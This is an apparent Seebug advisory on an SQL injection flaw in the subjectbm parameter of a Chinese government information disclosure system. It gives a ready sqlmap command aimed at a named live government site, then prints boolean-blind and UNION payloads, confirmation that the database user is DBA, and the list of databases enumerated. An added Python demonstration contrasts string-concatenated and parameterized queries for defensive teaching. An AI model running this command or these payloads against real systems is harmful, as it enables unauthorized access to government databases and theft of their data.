Dahan Bantong (大汉版通) Government Information Disclosure System SQL Injection

2014-05-19T00:00:00
ID SSV:93847
Type seebug
Reporter Root
Modified 2014-05-19T00:00:00

Description

Brief description:

Government information disclosure system

Details:

The government information disclosure system has an SQL injection vulnerability. Injection point: zfxxgk/subjectinfo.jsp?subjectbm= . The subjectbm parameter is not properly filtered, which allows injection. Example on a government website:

sqlmap.py -u "http://xxgk.sihong.gov.cn/zfxxgk/subjectinfo.jsp?subjectbm=" --is-dba --dbs

Payload:

```
Place: GET
Parameter: subjectbm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: subjectbm=%' AND 7860=7860 AND '%'='

Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: subjectbm=-9666%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(104)+CHAR(112)+CHAR(116)+CHAR(113)+CHAR(81)+CHAR(120)+CHAR(113)+CHAR(102)+CHAR(97)+CHAR(66)+CHAR(101)+CHAR(81)+CHAR(69)+CHAR(68)+CHAR(113)+CHAR(98)+CHAR(100)+CHAR(119)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL--

web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
current user is DBA: True
```
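As an added illustration that is not part of the original report, the following Python script reproduces the weak pattern the report describes (the `subjectbm` request value concatenated straight into the SQL text) beside a parameterized version, and runs the report's boolean-based payload through both. It assumes, from the `%'` prefix in sqlmap's payload, that the value lands inside a LIKE pattern; it uses sqlite3 only so it runs offline, whereas the real system is JSP on Microsoft SQL Server 2000, and the table name, columns and rows are constructed for the example.

```python
import sqlite3

# Constructed sample data: the real system is a JSP application on Microsoft
# SQL Server 2000 (per the report); sqlite3 is used only so the demo runs
# offline. Table and column names and the rows are invented for this example.
SAMPLE_ROWS = [
    ("001", "Annual budget report", 1),
    ("002", "Internal memo", 0),
    ("003", "Procurement notice", 1),
]

# The boolean-based blind payload exactly as sqlmap reported it for subjectbm.
REPORTED_PAYLOAD = "%' AND 7860=7860 AND '%'='"


def make_db():
    """Create an in-memory table standing in for the subjectinfo lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE subjectinfo (subjectbm TEXT, title TEXT, is_public INTEGER)"
    )
    conn.executemany("INSERT INTO subjectinfo VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, subjectbm):
    """The weak pattern: the request parameter is pasted into the SQL text.

    Quotes and operators in the value become part of the statement, so the
    structure of the WHERE clause is under the caller's control; the
    report's payload closes the LIKE literal and appends its own conditions,
    which is why every public row comes back.
    """
    sql = (
        "SELECT subjectbm, title FROM subjectinfo "
        "WHERE is_public = 1 AND subjectbm LIKE '%" + subjectbm + "%'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, subjectbm):
    """The fix: bind the value as a parameter (PreparedStatement in JSP/JDBC).

    The driver passes the value separately from the statement text, so quotes
    in it are just characters. Any '%' or '_' the user supplies still act as
    LIKE wildcards (escape them as well if that matters), but they can never
    close the string literal or add extra conditions to the query.
    """
    sql = (
        "SELECT subjectbm, title FROM subjectinfo "
        "WHERE is_public = 1 AND subjectbm LIKE ?"
    )
    return conn.execute(sql, ("%" + subjectbm + "%",)).fetchall()


def compare(subjectbm):
    """Run one input through both lookups; returns (vulnerable_rows, fixed_rows)."""
    conn = make_db()
    try:
        return lookup_vulnerable(conn, subjectbm), lookup_parameterized(conn, subjectbm)
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ("001", REPORTED_PAYLOAD):
        vuln, fixed = compare(value)
        print(f"input {value!r}")
        print(f"  concatenated query  -> {vuln}")
        print(f"  parameterized query -> {fixed}")
```

With the normal value `001` both lookups return the same single row; with the reported payload the concatenated query returns every public row (the condition collapses to `7860=7860 AND '%'='%'`), while the parameterized query treats the whole string as a pattern to match and returns nothing. The same true/false difference in the response is what sqlmap's boolean-based blind detection keys on, so the defensive takeaway is that the structure of the query must never depend on request data.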

The injection runs with administrator (DBA) privileges; listing the databases:

```
[*] gov
[*] jcms
[*] jcmsvc
[*] jis
[*] lm
[*] mailbook
[*] master
[*] model
[*] msdb
[*] newlm
[*] Northwind
[*] pubs
[*] sms
[*] tempdb
[*] vipchat
[*] xxgk
```

Proof of vulnerability:

Screenshot as proof:

<img src="https://images.seebug.org/upload/201405/19092456cbafedc0b217ecd615cfc4fffd292bf9.jpg" alt="1.jpg" width="600">